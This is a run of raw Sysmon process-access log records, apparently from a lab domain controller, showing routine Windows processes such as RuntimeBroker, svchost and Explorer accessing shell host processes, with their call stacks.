C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405716C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.179{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.179{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d3